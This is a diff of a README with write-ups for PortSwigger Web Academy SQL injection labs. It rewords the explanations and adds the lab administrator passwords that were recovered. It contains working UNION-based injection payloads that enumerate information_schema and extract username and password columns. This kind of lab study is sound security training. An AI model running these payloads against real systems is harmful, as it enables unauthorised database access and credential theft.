Luk4szf/PortSwigger/SQL injection/README.md

    This reveals a table named `users_xaurai`.

 2. **Identify Column Names:**
-   Next, query the `information_schema.columns` view to identify columns in the `users_xaurai` table:
+   Next, query the `information_schema.columns` view to identify the columns in the `users_xaurai` table:
    ```sql
    SELECT * FROM someTable WHERE category='any' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users_xaurai'--
    ```
-   This reveals columns like `username_huyzfv` and `password_mxlnvz`.
+   This reveals columns such as `username_huyzfv` and `password_mxlnvz`.

 3. **Extract Data:**
    Finally, retrieve the usernames and passwords:
    ```sql
    SELECT * FROM someTable WHERE category='any' UNION SELECT username_huyzfv, password_mxlnvz FROM users_xaurai--
    ```
-   The password for the `administrator` is discovered.
+   I discovered that the password for the administrator is `3r5z5qaj2hfhokbicr8a`.

 # SQL Injection UNION Attack: Retrieving Data from Other Tables

 ## Lab Description
 ![image](Picture/lab7.png)

-We know that the database contains a table named `users`, with columns `username` and `password`.
+We know the target database contains a table named `users` with columns `username` and `password`.

 ### Exploiting the Vulnerability

-Inject a `UNION` query to retrieve usernames and passwords:
+Inject a `UNION` query to retrieve usernames and passwords from the `users` table:

 ```sql
 SELECT * FROM someTable WHERE category='any' UNION SELECT username, password FROM users--
 ```

-The password for the `administrator` is revealed, allowing you to log in and solve the lab.
+I found that the password for the administrator is `absq994f53k4jwp77utl`.

 # SQL Injection UNION Attack: Retrieving Multiple Values in a Single Column

 ## Lab Description
 ![image](Picture/lab8.png)

-To retrieve multiple values in a single column, use the `||` string concatenation operator in Oracle.
+To retrieve multiple values in a single column, we use the `||` string concatenation operator in Oracle.

 ### Exploiting the Vulnerability